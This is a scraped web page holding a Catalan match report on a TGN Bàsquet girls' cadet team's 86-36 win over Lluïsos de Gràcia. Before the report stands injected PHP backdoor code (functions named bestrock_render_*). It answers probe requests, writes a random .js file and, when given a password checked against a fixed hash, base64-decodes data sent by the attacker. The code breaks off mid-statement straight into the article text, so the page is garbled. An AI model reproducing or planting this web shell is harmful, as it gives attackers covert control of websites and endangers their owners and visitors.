function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A fa una demostració de bon joc i derrota el Lluïsos de Gràcia (86-36) - Tgn Bàsquet Club -

El cadet femení 04 A fa una demostració de bon joc i derrota el Lluïsos de Gràcia (86-36)

Updated: setembre 25, 2018

L’equip cadet femení 04 A va vèncer el Lluïsos de Gràcia en un partit on les locals van demostrar la seva superioritat col·lectiva. L’equip que entrena Albert del Rey va agafar els primers avantatges gràcies a un bon atac, sense presses, triant sempre la situació que els donava avantatge. En el segon quart, ofensivament, l’equip lila va continuar sumant mentre jugava amb criteri però la falta d’intensitat defensiva va permetre a les visitants estar a una distància assumible del seu rival (32-22).

Després del descans, però, el TGN Bàsquet va mostrar la seva qualitat i va imposar-se clarament al seu adversari.